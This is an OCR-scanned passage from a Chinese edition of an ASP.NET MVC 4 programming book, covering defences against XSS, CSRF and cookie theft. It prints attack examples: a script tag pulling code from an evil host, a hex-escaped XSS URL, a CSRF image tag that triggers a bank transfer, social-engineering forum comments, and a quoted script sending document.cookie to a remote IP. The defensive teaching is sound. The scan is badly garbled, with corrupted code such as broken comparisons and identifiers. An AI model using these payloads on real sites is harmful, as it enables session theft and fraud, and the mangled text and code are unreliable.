这 里 值得 一 提 的 是 , ASPNET Web Forms 把 程序 员 引 导 到 了 一 个 使 用 了 服务 器 控制 和 回 
调 的 系统 中 , 这 样 可 以 阻止 大 多 数 的 XSS 攻击 。 虽然 不 是 所 有 的 服务 器 控制 都 可 以 防御 XSS 
攻击 (例如 标签 和 字面 量 )， 但 是 整个 Web Forms 程序 包 都 倾向 于 把 我 们 推 向 安全 的 方向 。 

ASPNET MVC 提供 了 更 多 上 自由 一 一 但 它 也 支持 一 些 开 箱 即 用 的 保护 。 例 如 ， 使 用 
HtmlHelpers 对 HTML 以 及 每 个 标签 的 特性 值 进行 编码 。 此 外 ， 因 为 仍然 在 页 面 模 型 中 工 
作 ， 所 以 每 个 请 求 会 一 直 保 持 有 效 ， 直 到 手动 关闭 。 

但 是 ， 为 了 使 用 ASPNET MVC， 不 一 定 要 使 用 上 述 方法 。 可 以 使 用 奉 代 的 视图 引擎 
手动 编写 HIMI 一 一 这 都 取决 于 个 人 人， 而且 这 也 是 关键 所 在 。 然 而 ， 我 们 需要 在 知道 放弃 
了 哪些 自动 安全 特性 的 基础 上 做 出 决定 。 

2) Html.AttributeEncode 和 Url.Encode 

大 部 分 情况 下 ， 我 们 关注 的 是 页 面 上 的 HIML 输出 ; 然而 ， 保 护 那些 在 HTML 中 动 
态 设置 的 特性 也 是 非常 重要 的 。 前 面 最 初 给 出 的 示例 已 经 阐述 了 这 个 问题 ， 它 演示 了 如 何 
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通过 向 作者 的 URL 中 注入 杀 种 悉 意 代码 来 哄 纹 URL。 该 示例 之 所 以 能 够 实现 攻击 ， 是 因 
为 它 输 出 了 如 下 所 示 的 销 标 记 : 


<a href="<$%®=Url1 .Action (AuthorUrl)$>"><$%=AuthorUrl®s></a> 


为 了 合适 地 掩饰 (sanitize) 这 个 链接 ， 必 须 确 保 对 预期 的 URL 进行 编 始 。 这 样 就 可 以 用 
其 他 字符 来 替换 URL 中 保留 的 字符 ， 比 如 %20 会 蔡 换 URL 中 的 宇 格 (" 由 字符 。 
此 外 还 有 一 种 情形 ， 即 通过 URL 传递 用 户 在 站 点 革 处 的 输入 值 : 


<a href="<$®=Url.Action("index", "home",new {name~=VijewDatal" "name™ |})$>">Click 
here</a> 


如 果 过 到 不 怀 好 意 的 用 户 ， 他 可 能 将 name 值 改 为 : 
"></a><script src="http://srizbitrojan.evil.example.com"></script> <a href=" 


然后 将 其 继续 传递 给 一 个 没有 戒心 的 用 户 。 幸 好 ， 我 们 可 以 使 用 Url.Encode 或 
Html.AttributeEncode 方法 编码 URL 中 传递 的 用 户 输入 值 ， 从 而 避免 这 个 威胁 。 


<a href="<$®=Ur1l .Action("index"”," home" ,new 
{name=Html .AttributeEncode (ViewData["name™".|)})$>">Click here</a> 


或 者 : 


<a hreft= < 要 =UTTL .Encode (Url .Action(" Index ”home ， 


new {fname=ViewData["name"])) 站 >">C1LicK here</a> 


说 记 : 永远 不 要 信任 用 户 能 够 接触 到 或 使 用 的 一 切 数据 ， 其 中 包括 所 有 的 表单 值 、 
URIL、cookie 或 来 日 第 三 方 源 ( 如 OpenID) 的 个 人 信息 。 些 外， 网 站 所 访问 的 数据 库 或 服务 
可 能 没有 对 这 些 数据 进行 编外 ， 所 以 不 要 相信 箱 入 应 用 程序 的 任何 数据 ， 要 尽 可 能 地 对 它 
们 进行 编码 。 

3) JavaScript 编码 

只 使 用 HTML 编码 所 有 内 容 是 远 不 够 的 。 事 实 上 ，HTML 编码 并 不 能 阻止 JavaScript 
的 执行 。 为 了 说 明 这 一 点 ， 下 面 列举 一 个 简单 例子 。 

这 里 假设 ， 我 们 修改 默认 MVC 4 Internet 应 用 程序 中 的 HomeController 控制 器 ， 使 它 
接收 一 个 用 户 名 称 作 为 参数 ， 并 把 接收 的 值 添加 到 ViewData 中 ， 以 便 在 欢迎 消息 中 显示 : 

public ActionResult InaeXx(strlIng UserName) 

ViewBag.UserName = UserName; 

return View(); 

} 

假设 要 让 网 站 访问 者 关注 这 条 消息 ， 因 此 使 用 了 下 面 的 jQuery 代码 进行 显示 。/Home/ 
Index.cshtml 视图 更 新 后 的 header 部 分 代码 如 下 所 示 : 
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@1{ 
ViewBag.Title = "Home Page”; 
} 
Qsection featureqd { 
<Section class="featured" > 
<div class="content-wrapper"> 
<hgroup class="title"> 
<hl>@ViewBag.Title.</hl> 
<h2 id="welcome-message"></h2> 
</hgroup> 
</div> 
</section> 


Qsection scripts I 
Qif (ViewBag.UserName != null) I 
<script type="text/jJavascript"> 
$s (function () If 
Var msg = 'Welcome, QViljewBag.UserName!',; 
$ ("#welcome-message") .html (msg) .hide() .show('sLow') : 
}); 
</script> 
} 
} 


看 起 来 非常 完美 ， 因 为 这 里 对 ViewBag 的 值 进行 了 HIML 编码， 但 这 样 就 绝对 安全 
了 吗 ? 不 , 这 样 其 实 并 不 安全 。 下面 经 HTML 编码 后 的 URL 仍然 有 漏洞 , 如 图 7-18 所 示 。 


http://localhost:13371/?UserName=Jon\x3cscript\x3e$®20alert (\x27pwnd\x27) 
S20\x3c/script\x3e 


https//localhost45348 Use D ~ BCX | CHomepage- MyASPNET., x | 


7-18 
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怎么 会 这 样 呢 ? 记 住 , 这 里 只 是 对 其 进行 了 HTML 编码 , 而 没有 进行 JavaScript 编码 。 
这 样 就 允许 用 户 在 输入 的 值 中 插入 JavaScript 脚本 字符 串 ， 随 后 把 这 些 脚本 字符 串 添加 到 
文档 对 象 模 型 (Document Object Model，DOM) 中 。 也 就 是 说 ， 黑 客 可 以 利用 十 六 进 制 转 义 
但 随意 地 回 和 输入 内 容 中 插入 JavaScript 脚本 代码 。 与 前 面 提 到 的 一 样 ， 要 说 记 ， 真 正 的 黑 
客 不 会 显示 一 个 JavaScript 警告 一 一 他 们 会 做 一 些 那 恶 的 事情 ， 比 如 在 用 户 没有 丝毫 察觉 
的 情况 下 窃取 用 户 信息 或 将 用 户 重 定向 到 另 一 个 Web 页 面 等 。 

这 个 问题 有 两 种 解决 方法 。 一 种 严密 的 方法 是 使 用 Ajax.JavaScriptstringEncode 辅助 函 
数 对 在 JavaScript 中 使 用 的 字符 串 进 行 编码 ， 与 前 面 介绍 的 使 用 Html.Encode 辅助 方法 对 
HTML 字符 串 编码 一 样 。 第 二 种 方法 比较 彻 确 ， 使 用 AntiXSS 库 。 

4) 将 AntiXSS 库 作 为 ASPNET 的 默认 编码 器 

AntiXSS 库 可 以 为 ASPNET 应 用 程序 增加 一 层 额 外 的 防护 。 它 的 工作 机 制 与 ASPNET 
和 ASPNET MVC 的 编码 图 数 相 比 有 几 点 重要 的 差异 ， 但 最 重要 的 是 如 下 两 点 : 


注意 ”可 以 重 写 默 认 编 码 方 法 这 一 扩展 是 在 ASPNET 4 中 新 添加 的 ， 因 
此 在 先前 的 框架 版 本 中 不 能 使 用 这 个 方法 。 由 于 MVC 4 适用 于 NET4 和 NET 
的 后 续 版 本 , 因此 MVC 4 中 可 以 使 用 这 一 扩展 。 然 而 , MVC 先前 运行 在 NET 
3.5 上 的 版 本 不 能 覆盖 默认 的 编码 方法 。 


e AntiXSS 使 用 一 个 信任 字符 的 白 名 单 , 而 ASPNET 的 默认 实现 使 用 一 个 有 限 的 不 
信任 字符 的 黑 名 单 。AntiXSS 只 允许 已 知 安全 的 输入 ， 因 此 它 提供 的 安全 性 能 
超过 试图 阻止 潜在 有 害 输入 的 过 滤器 。 

e AntiXSS 库 的 重点 是 阻止 应 用 程序 中 的 安全 漏洞 ， 而 ASP.NET 编码 主要 关注 防止 
HTML 页 面 的 显示 不 被 破坏 。 

要 使 用 AntiXSS 库 ， 只 需 安装 AntiXSS 的 NuGet 包 。 


Install-Package Ant1IXSS 


注意 在 AntiXSS 4.1 之 前 ， 我 们 不 得 不 编写 一 个 新 类 ， 并 且 该 类 需要 继 
承 HttpEncoder 类 ， 当 需要 进行 编码 时 ， 我 们 就 调用 该 类 中 的 方法 ， 而 不 调用 
Html Encode 方法 。 对 于 AntiXSS 4.1 而 言 ， 不 再 需要 这 么 做 ， 因 为 新 的 类 库 
默认 提供 了 一 个 编码 器 类 。 


完成 以 上 步骤 后 ， 当 任何 时 候 调 用 Html.code 方法 或 使 用 HTML 编码 代码 块 <%: %> 
时 ，AntiXSS 库 就 会 对 其 文本 进行 编码 ， 它 既 进 行 HIML 编码 也 进行 JavaScript 编码 。 

也 可 以 利用 AntiXSS 编码 器 执行 一 个 高 级 的 JavaScript 字符 串 编码 来 防御 一 些 复杂 攻 
击 ， 这 种 高 级 编码 可 利用 Ajax.JavaScriptStrineEncode 辅助 函数 来 实现 。 下 和 面 的 代码 示例 演 
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示 了 如 何 实现 这 一 防御 功能 。 首 先 添加 一 条 @using 语句 来 引入 AntiXSS 编码 右 的 名 称 空 
间 ， 然 后 再 使 用 其 中 的 Encoder.JavaScriptEncode 辅助 函数 。 代 码 如 下 所 示 : 


Qusing Microsoft.Security.Application 


@1{ 
ViewBag.Title = "Home Page"’ 
} 
Qsection featured 1 
<Ssection class="featured" > 
<diyv class="content-—wrapper"> 
<hgroup class="title"> 
<hl>@ViewBag.Title.</hl> 
<h2 id="Wwelcome-message"></h2> 
</hgroup> 
</div> 
</section> 


Qsection scripts f 
Qif (ViewBag.UserName != null) { 
<Sscript type="text/jJavascript"> 
s(function () f 


Var msg = 'Welcome, (Encoder.JavaSscriptEncode (ViewBag .UserName, 


false)!'.: 


5s ("#welcome-message") .htm]l (msg) .hide() .show('slow'); 


}); 
</script> 
} 
} 


执行 这 段 代 人 码 后 ， 我 们 就 会 看 到 前 和 面 的 攻击 不 再 成 功 ， 如 图 7-19 


bn I 今 | http:/ /localhost45348/?UserName= Dp -BX Home page - My ASP.NET ... 


Home About Contact 


Home Page. Welcome, Jon\x3cscript\x3e alert(\x27pwnd\x27) 
\x3c/script\x3e! 


名 2012 - My ASPNET MVC Application 
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7.5.2 威胁 : 跨 站 请 求 伪 造 


正如 前 面 介 绍 的 ,路 站 请 求 伪 造 (Cross-Site Request Forgery, CSRF, 有 时 也 用 缩写 XSRF 
表示 ) 攻 击 要 比 简单 的 跨 站 脚本 攻击 更 具 危 险 性 。 本 节 讲 解 跨 站 请 求 伪造 攻击 ,主要 从 它 的 
危害 及 如 何 防 止 它 两 方面 加 以 前 述 。 


1 威胁 概述 


为 充分 地 理解 CSRF 的 概念 ， 我 们 将 其 分 为 两 部 分 来 曾 述 ， 分 别 是 XSS 和 混 消 代理 
(confused deputV)。 前 面 已 经 介绍 了 XSS， 但 是 混 清 代理 是 一 个 新 概念 ， 值 得 讨论 一 下 。 
Wikipedia 上 这 样 摘 述 混 消 代理 攻击 : 


混淆 代理 是 一 个 计算 机 程序 ， 它 被 其 他 部 分 程序 无 章 地 吊 弄 ， 以 至 于 错误 地 使 用 自己 
的 权限 。 它 是 特权 扩大 (privilege escalation) 的 一 个 有 具体 类 型 . 
——http://en.wikipedia.ore/wiky/Confused deputy problem 


在 此 类 情形 中 ， 代 理 就 是 用 户 的 浏览 费 ， 它 受到 了 厦 弄 以 全 于 误 用 其 权限 ， 将 用 户 呈 
现 给 远程 的 网 站 。 为 进一步 站 明 这 个 问题 ， 下 面 列举 一 个 简单 而 喜 琐 的 示例 。 
假设 正在 未 步 构 建 一 个 外 观 精美 的 网 站 ， 允 许 用 户 登 录 和 退出 ， 以 及 在 站 点 中 进行 权 
限 内 的 任何 操作 。 在 AccountController 控制 费 中 ，Login 操作 尽量 保持 何 单 ， 然 后 再 在 其 
中 添加 一 个 Logout 操作 ， 实 现 执行 该 操作 后 ， 系 统 删除 登录 用 户 的 信息 : 
public ActionResult Logout () | 
EormsAuth.Signout () ; 
return RedirectToAction("Index", "Home™ ) ， 
} 
现在 , 假设 站 点 允许 输入 白 名 单 中 有 限 的 HTML( 一 个 可 接受 的 标签 或 字符 的 列表 ， 列 
表 中 的 内 容 可 能 另行 编码 ) 作 为 评论 系统 的 一 部 分 (可 能 编写 的 是 论坛 应 用 程序 或 博客 应 用 
程序 ) 一 大 部 分 的 HIML 都 经过 了 精简 或 净化 ， 但 是 因为 想 让 用 户 能 够 发 布 截图 ， 所 以 对 
图 片 不 加 限制 。 
如 果 有 一 天 ， 某 人 将 在 评论 中 添加 了 这 个 稍 带 恶意 的 HTML 图 片 标签 : 


<img src="/account/logout™ /> 


现在 ， 一 旦 有 人 访问 该 页 面 ， 浏 览 器 就 会 自动 请 求 这 个 “图 片 ” 其 实 这 并 不 是 一 个 
图 片 ， 然 而 请 求 之 后 他 们 就 会 退出 站 点 。 同 样 ， 这 未 必 是 一 个 CSRF 攻击 ， 却 展示 了 如 何 
在 用 户 不 知 不 觉 的 情况 下 ， 使 用 “ 挂 羊 头 卖 狗肉 ”的 伎俩 来 欺骗 浏览 器 向 任意 指定 的 站 点 
发 出 GET 请 求 。 在 这 个 例子 中 ， 浏 览 器 发 出 GET 请 求 ， 本 来 是 想 请 求 图 片 ， 相 反 ， 它 却 
调用 退出 例 程 并 传递 用 户 的 cookie。 这 就 是 混淆 代理 。 

CSRF 攻击 是 基于 浏览 器 的 工作 方式 运作 的 。 在 登录 到 一 个 站 点 后 ， 信 息 将 以 cookie 
形式 存储 到 浏览 器 中 ， 可 能 是 存储 在 内 存 中 的 cookie(“ 会 话 ”cookie)， 也 可 能 是 写 到 硬盘 
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文件 中 更 为 持久 的 cookie。 通 过 这 两 种 cookie 中 的 任意 一 种 ， 浏 览 器 会 告诉 站 点 这 是 一 个 
真实 用 户 发 出 的 请 求 。 

使 用 XSS 加 混淆 代理 (和 其 他 攻击 一 样 ， 再 使 用 一 些 社会 工程 ) 来 实现 对 用 户 攻 击 的 能 
力 正 是 CSRF 的 核心 。 遗 憾 的 是 ， 很 多 站 点 恰巧 都 没有 针对 CSRF 这 一 轮 点 采取 切实 有 效 
的 防御 措施 (下 面 即 将 谈 到 这 一 点 )。 

下 面 来 看 一 个 真实 的 CSRF 攻击 例子 ， 从 黑客 角度 看 ，CSRF 攻击 能 对 受 大 众 喜 欢 而 
未 受 保护 的 站 点 产生 很 大 的 破坏 。 这 里 没有 使 用 真实 的 名 称 ， 不 妨 将 该 站 点 称 为 “Big 
Masslve Slte 。 

需要 立刻 指明 的 是 , 黑客 与 Big Massive Site 站 点 用 户 之 间 的 游戏 是 一 场 实 力 不 均 衡 的 
较量 。 有 多 种 方式 可 以 增 大 这 种 不 均衡 性 ， 这 些 稍 后 就 会 介绍 ， 但 由 于 Big Massive Site 站 
点 每 天 有 将 近 5 干 万 个 请 求 ， 所 以 局 势 有 利于 黑客 一 方 。 

现在 来 曾 述 游戏 的 本 质 一 一 查找 可 以 对 Big Massive Site 站 点 的 安全 漏洞 做 哪些 操作 ， 
如 包含 站 点 上 的 链接 评论 。 在 网 上 冲浪 尝试 各 种 事物 时 ， 积 累 了 一 个 “广泛 使 用 的 在 线 银 
行 站 点 ”(Widely Used Online Banking Sites) 列 表 ， 这 些 银 行 站 点 文 持 在 线 转账 和 账单 支付 。 
经 过 研究 ， 了 解 了 这 些 广泛 使 用 的 在 线 银行 站 点 啊 应 转账 请 求 的 原理 ， 我 们 会 发 现 有 一 种 
方式 存在 非常 严重 的 安全 漏洞 一 一 转账 标识 在 URL 中 ， 如 下 所 示 : 


http://widelyusedbank.example.com?function=transfer&tamount=]1000&toaccou 
ntnumber=23234554333&from-=checking 


这 种 标识 方法 令 人 非常 吃惊 , 看 起 来 简直 愚蠢 之 极 -一 哪 家 银行 会 这 样 做 ”遗憾 的 是 ， 
这 个 问题 的 答案 不 是 一 家 银行 而 是 很 多 家 银行 在 做 ， 原 因 很 简单 一 一 Web 开发 人 员 过 分 信 
任 浏览 器 。 上 面 的 URL 请 求 依赖 于 这 样 的 假设 ， 服 务 器 将 使 用 来 自 会 话 cookie 的 信息 来 
验证 用 户 的 身份 和 账户 。 其 实 ， 这 并 不 是 一 个 很 坏 的 假设 一 一 会 话 cookie 中 的 信息 可 以 避 
狗 每 次 页 面 请 求 时 都 要 重新 登录 。 浏 览 锅 必须 要 记 住 一 些 信息 。 

上 面 还 有 一 些 内 容 没 有 讨论 到 ， 即 需要 使 用 一 些 社会 工程 方面 的 知识 。 以 黑客 的 身份 
登录 到 Big Massive Site 站 点 中 ， 将 如 下 内 容 作为 评论 输入 到 其 中 一 个 主页 面 上 : 


Hey, did you know that IF you're a Widely Used Bank customer the sum of the 


digits of your account number add up to 30? It's true! Have a look: 
http://www.widelyusedbank.example.com." 


然后 退出 Big Massive Site， 并 用 第 二 个 假 账户 再 次 登录 站 点 ， 以 不 同名 称 的 虚构 用 户 
在 上 面 的 “种 子 ”(seed) 评 论 后 面 留 下 一 个 评论 : 
"OMG YOU Te right! How welird!<img src =" 


http://widelyusedbank.example.com?function=transfer&tamount=]1000&toaccou 
ntnumber=23234554333&from=checking"” />. 


Widely Used Bank 的 客户 看 到 评论 后 ， 很 可 能 就 会 登录 他 们 的 账户 ， 并 计算 账号 数字 
的 累加 和 。 如 果 计 算 之 后 发 现 累加 和 不 等 于 30， 他 们 就 会 回 到 Big Massive Site， 再 次 阅读 
评论 (或 留 下 上 自己 的 评论 ,“ 不 对 ， 我 的 累加 和 不 是 30”)。 
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超人 憾 的 是 ，Perfect Victim 的 浏览 器 仍然 把 他 的 登录 会 话 信 息 保 存在 内 存 中 一 一 也 就 是 
说 他 仍然 处 于 登录 状态 ! 当 他 浏览 到 带 有 CSRF 攻击 的 页 面 时 ，CSRF 页 面 就 会 向 银行 的 


站 点 发 送 一 个 请 求 (而 银行 站 点 却 不 知道 友 送 请 求 的 另 一 奖 是 黑客 )， 结 果 Perfect Victim 的 
钱 就 于 失 了 be 


在 评论 中 带 有 CSRF 攻击 的 链接 图 片 将 作为 一 个 不 完整 的 红 和 来 泻 染 ， 而 大 部 分 人 都 
会 把 它 看 成 一 个 损坏 的 头像 或 表情 符号 。 然而, 事实 上 , 它 是 一 个 使 用 GET 请 求 在 服务 器 
端 执 行 操作 的 远程 页 和 面 调用 一 一 也 就 是 驴 取 现金 的 混 清 代理 攻击 。 很 凑巧 的 是 ， 有 问题 的 
浏览 器 竟然 是 Perfect Victim 的 浏览 器 一 一 因此 这 是 不 可 追踪 的 (假设 在 巴哈马 群岛 等 地 已 
经 有 假 账户 )。 这 几乎 是 完美 的 犯罪 ! 

这 种 攻击 不 仅仅 局 限于 简单 图 像 标 签 /GET 请 求 的 欺骗 ; 它 还 可 以 很 好 地 扩展 到 垃圾 邮 
件 应 用 领域 ,垃圾 邮件 传播 者 同人 们 发 送 虚假 链接 ， 并 费 尽 周折 地 让 人 们 单 击 链接 ， 以 使 
人 们 进入 他 的 站 点 (与 大 部 分 僵尸 攻击 类 似 )。 当 人 们 单 击 链接 登录 到 他 的 站 点 时 ， 隐 藏 的 
iFRAME 或 一 些 脚本 将 自动 使 用 HTTP POST 请 求 向 银行 提交 一 个 表单 ， 试 图 转账 。 如 果 
此 时 恰好 有 一 个 Widely Used Bank 的 客户 在 未 退出 银行 网 站 的 情况 下 单 击 了 这 个 链接 ， 那 
么 此 次 攻击 就 会 成 功 。 

回顾 前 面 的 论坛 帖子 中 的 社会 工程 诈骗 ， 为 让 后 一 个 攻击 取得 成 功 ， 只 需 再 添加 一 个 
额外 的 跟 帖 即 可 : 


Wow! And did you know that your savings account number adds up to 50? This 


15 S50 Welrd 一 read this news release about It: 
<a href="http://badnastycsrfsite.example.com">CNN.com</a> 
It's really welird! 
显然 ， 这 里 甚至 不 需要 使 用 XSS， 只 要 植 入 URL， 等 竺 那些 思春 至 极 的 人 来 上 钩 就 行 
( 即 先 进入 到 他 们 在 Widely Used Bank 上 开设 的 账户 , 然后 再 重 定 四 到 为 他 们 准备 的 虚假 页 
[0 http://badnastycsrfsite.example.com). 
2. 阻止 CSRF 攻击 


可 能 有 人 认为 ， 这 一 问题 应 该 由 框架 来 解决 一 一 确实 如 此 ! ASPNET MVC 提供 了 解 
决 方法 并 且 把 它 交 给 了 程序 员 ， 因 此 ， 更 准确 的 说 法 是 ，ASPNET MVC 应 该 使 程序 员 做 
正确 的 事 ， 事 实 也 正 是 如 此 。 


1) 令 牌 验证 

ASPNET MVC 框架 提供 了 一 个 阻止 CSRF 攻击 的 好 方法 ， 它 通过 验证 用 户 是 否 自愿 
地 向 站 点 提交 数据 来 达到 防御 攻击 的 目的 。 实 现 这 一 方法 最 简单 的 方式 就 是 ， 在 每 个 表单 
请 求 中 插入 一 个 包含 唯一 值 的 隐藏 输入 元 素 。 可 以 使 用 HTML 辅助 方法 在 每 个 表单 中 包含 
如 下 代码 来 生成 该 隐藏 输入 元 素 : 


<form action="/account/register™" method="post"> 
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QHtm]l .AntiForgeryToken () 
</form> 


Html.AntiForgeryToken 辅助 方法 会 输出 一 个 加 密 值 作为 隐 藏 的 输入 元 素 : 


<input type="hidden" value="01283iudny3l]lw90hjhf Aua > 


该 值 将 与 作为 会 话 cookie 存储 在 用 户 浏 览 器 中 的 男 一 个 值 相 无 配 。 在 提交 表单 时 ， 
ActionFilter 就 会 验证 这 两 个 值 是 否 逻 配 : 


[ValidateAntiforgeryToken | 
public ActionResult Regilster(...) 


虽然 这 种 方法 就 可 以 阻止 大 部 分 的 CSRF 攻击 ， 但 它 并 非 能 很 好 地 防御 所 有 的 CSRF 
攻击 。 上 面 的 示例 中 讲解 了 如 何在 网 站 上 自动 注册 用 户 ， 从 中 可 以 看 出 防伪 造 令 牌 的 方法 
可 以 阻 | 上 Register 方法 上 大 部 分 基于 CSRF 的 攻击 ， 但 它 不 会 终止 外 面 的 机 器 人 ， 这 些 机 
器 人 仍然 继续 寻求 在 网 站 上 上 自动 注册 用 户 和 制造 垃圾 邮件 (spam) 的 方法 。 本 章 后 和 面 将 讨论 
解决 这 类 情况 的 方法 。 


2) 客 等 的 GET 请求 

窜 等 的 GET 请求， 虽然 看 起 来 很 深奥 ， 但 它 只 是 一 个 简单 概念 。 如 果 一 个 操作 是 朝 等 
的 ， 就 可 以 重复 执行 多 次 而 不 改变 执行 结果 。 一 般 来 说 ， 仅 通过 使 用 POST 请 求 修 改 数据 
库 中 或 网 站 上 的 内 容 , 就 可 以 有 效 地 防御 全 部 的 CSRF 攻击 , 这 里 的 修改 包括 Registration、 
Logout 和 Login 等 操作 。 这 种 方法 至 少 也 可 以 一 定 程度 上 限制 混淆 代理 攻击 。 


3) HttpReferrer 验证 
男 一 种 阻止 CSRF 攻击 的 方法 是 使 用 ActionFilter。 这 种 情形 下 ， 可 查看 提交 表单 值 的 
客户 端 是 否 确 实在 目标 站 点 上 : 


public class IsPostedFromThisSiteAttribute : AuthorijzeAttribute 


{ 
public override void OnAuthorize (AuthorizationContext filterContext) 
{ 
if (filterContext.HttpContext = null) 
{ 
if (filterContext.HttpContext.Request.UrlReferrer == null) 
throw new System.Web.HttpException("Invalid SubmisslIon ) ; 
if (filterContext.HttpContext.Request.UrlReferrer.Host = 
"mysite.com”") 
throw new System.Web.HttpException 
("This form wasn't submitted from this sitel!l™); 
} 
} 
} 
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然后 在 Register 方法 上 添加 这 个 过 滤器 ， 代 码 如 下 : 


[IsPostedFromThissitel| 
public ActionResult Register(...) 


上 和 面 综述 了 几 种 不 同 的 防御 CSRF 的 方法 ， 这 也 正 是 MVC 的 意义 所 在 。 了 解 了 这 些 
方法 ， 我 们 就 可 以 根据 目 己 的 喜好 和 网 站 特点 来 选择 具体 使 用 哪 种 方法 。 


7.5.3 威胁: cookie 窗 窃 


cookie 是 一 种 增强 Web 可 用 性 方法 , 因为 大 部 分 网 站 在 用 户 登 录 后 都 使 用 cookie 来 识 
别 用 户 映 份 。 如 果 没 有 cookie， 用 户 就 不 得 不 一 次 又 一 次 地 登录 网 站 。 但 是 如 果 攻 击 者 次 
鳃 了 cookie， 他 就 可 以 冒充 用 户 和 号 份 在 网 站 上 进行 操作 。 

作为 用 户 , 为 了 避免 目 己 在 特定 站 点 上 的 cookie 被 盗 , 可 在 浏览 器 上 选择 禁用 cookie， 
但 是 这 样 很 可 能 在 访问 某 个 网 站 时 弹出 无 礼 的 警告 “Cookies must be enabled to access this 
slte 。 


丁 介绍 cookie 盗 镭 攻击 ， 主 要 从 它 的 危害 及 如 何 防 御 两 方面 来 前 述 。 
1 威胁 概述 


网 站 使 用 cookie 来 存储 页 面 请 求 或 浏览 会 话 之 间 的 信息 。 其 中 一 些 信 息 是 无 关 紧 要 的 ， 
像 站 点 偏好 和 站 点 历史 每 ， 但 是 其 他 站 点 可 以 在 不 同 请 求 中 确认 用 户 身 份 的 信息 却 非常 重 
要 ， 比 如 ASPNET 的 表单 验证 摆 据 (ASPNET Forms Authentication Ticket)。 

cookie 主要 有 两 种 形式 : 

e 会话 cookie: 会 话 cookie 存储 在 浏览 器 的 内 存 中 ， 在 浏览 器 的 每 次 请 求 中 通过 

HTTP 头 信息 进行 传递 。 

e 持久 性 cookie: 持久 性 cookie 存储 于 计算 机 硬盘 上 的 实际 文本 文件 中 ， 并 与 会 话 

cookie 以 相同 的 方式 传递 。 

二 者 的 主要 区 别 在 于 :会 话 cookie 稼 币 在 会 话 结束 时 瑟 记 会 话 cookie, 而 持久 性 cookie 
则 不 同 ， 在 下 一 次 访问 站 点 时 ， 站 点 仍然 记得 它 。 

如 果 能 够 鳃 取 某 人 在 一 个 网 站 上 的 身份 验证 cookie， 就 可 以 在 该 网 站 上 冒充 他 ， 执 行 
他 权限 内 的 所 有 操作 。 这 种 攻击 实际 上 非常 简单 ， 但 它 依赖 于 XSS 漏洞 。 攻 击 者 只 有 在 目 
标 站 点 上 注入 一 些 脚本 ， 才 能 鳃 取 cookie。 

在 对 StackOverflow.com 测试 期 间 ，CodingHorrorcom 的 Jeff Atwood 在 接 写 的 博文 中 
提 到 了 这 一 问题 : 


那么 ， 可 以 想象 一 下 ， 当 您 注意 到 网 站 上 一 些 企业 用 户 以 管理 员 身 份 登录 进来 ， 并 很 
开心 地 使 用 他 完全 不 受 约束 的 管理 权限 攻击 系统 ， 此 时 是 多 人 么 吃惊 。 


——http://www.codinehorror.com/blog/2008/08/protecting-your-cookies-httponly.html 


这 怎么 可 能 发 生 呢 ? 当然 是 XSS 的 功 夯 。 这 一 切 都 是 从 回 用 己 资 料 页 面 涩 加 的 一 段 脚 


167 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


本 开始 的 : 


<img src=""http://www.a.com/a.jJpg<script type=text/javascript 
src="http://1.2.3.4:8] /xss.]s">" /><<img 
src=""http://www.a.com/a.jpg</script>" 


StackOverflow.com 允许 在 评论 中 包含 有 一 定数 量 的 HTML 标记 ， 这 也 正 是 XSS 黑客 
所 期 望 的 。Jeff 在 自己 的 博客 中 提供 的 一 个 示例 很 好 地 说 明了 : 攻击 者 如 何 将 脚本 注入 到 
看 似 平常 的 功能 页 面 ， 比 如 添加 一 个 屏幕 截图 。 

Jeff 对 XSS 注入 攻击 采取 了 白 名 单 的 防御 措施 一 一 这 是 他 自己 编写 实现 的 。 在 这 个 情 
形 中 ， 攻 击 者 利用 了 Je 个 上 自己 编写 HTML 净化 器 (sanitizemD 的 一 个 漏洞 : 


通过 精心 的 构建 ,这 个 难看 的 URL 只 是 勉强 通过 了 净化 器 。 当 在 浏览 器 中 查看 时 ,最 
后 泻 染 的 代码 会 加 载 和 执行 来 自 远程 服务 器 的 脚本 。JavaScript 代码 如 下 所 示 : 

window.location="http://1.2.3.4:81/r.php?u=" 

+TQocument .1]inks|[l1| .text 

+"&1="+document.1links|[l1l| 


+"&C="+document .cookie; 


此 时 ， 如 果 浏 览 器 加 载 了 这 个 注入 脚本 的 用 户 资 料 页 面 ， 它 束 会 在 用 户 军 不 知情 的 情 
况 下 把 他 们 的 cookie 传送 给 某 个 远程 的 绰 恶 服务器。 

这 样 攻 击 者 就 迅速 地 资 取 了 StackOverfow.com 用 户 的 cookie， 甚 至 Je 任 也 未 能 幸免 。 
有 了 Jeff 的 cookie， 攻 击 者 就 可 以 冒充 Jeff 的 身份 登录 站 点 (仍然 在 测试 阶段 )， 来 做 他 想 
做 的 任何 操作 。 这 确实 是 一 个 非常 狐 独 的 黑客 。 


2. 使 用 HttpOnly 阻止 cookie 盗窃 


为 StackOverflow.com 攻击 提供 便利 的 主要 有 两 方面 内 容 : 

e。 XSS 漏洞 : Jeff 坚持 自己 编写 反 XSS 攻击 代码 。 通 常情 况 下 ， 这 并 不 是 一 个 好 主 
意 , 而 应 该 依赖 类 似 于 BB Code 或 其 他 允许 用 户 格式 化 输入 值 的 方法 来 防御 攻击 。 
在 上 面 的 示例 中 ，Je 企 为 攻击 者 打开 了 XSS 攻击 的 大 门 。 

e Cookie 缺陷 : 上 面 的 示例 中 没有 将 StackOverflow.com 的 cookie 设置 为 禁用 来 目 
客户 请 浏览 堪 的 修改 。 

事实 上 ， 可 停止 脚本 对 站 点 中 cookie 的 访问 ， 只 需 设置 一 个 简单 标志 : HttpOnly。 可 

以 在 web.config 文件 中 对 所 有 cookie 进行 设置 ， 代 码 如 下 所 示 : 


<httpCookies domain="™" httpOnlyCookies="true”" requireSssL="false™ /> 
也 可 在 程序 中 为 编写 的 每 个 cookie 单独 设置 ， 代 码 如 下 : 


Response.Cookies["MyCookie" | .Value="Remembering you..”?} 
Response.Cookies["MyCookie]|] .HttpOnly=true; 
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这 个 标志 的 设置 会 告知 浏览 器 ,除了 服务 器 修改 或 设置 cookie 之 外 ,其 他 一 些 对 cookie 
的 操作 均 无 效 。 尽 管 该 方法 非常 简单 ,但 它 却 可 以 阻止 大 部 分 基于 XSS 的 cookie 问题 。 因 
为 脚本 很 少 访问 cookie， 所 以 我 们 经 常 使 用 这 个 功能 。 
7.5.4 威胁: 重复 提交 

模型 绑 定 是 ASPNET MVC 提供 的 一 个 强大 功能 ， 它 遵照 命名 约定 把 输入 元 素 映 射 到 


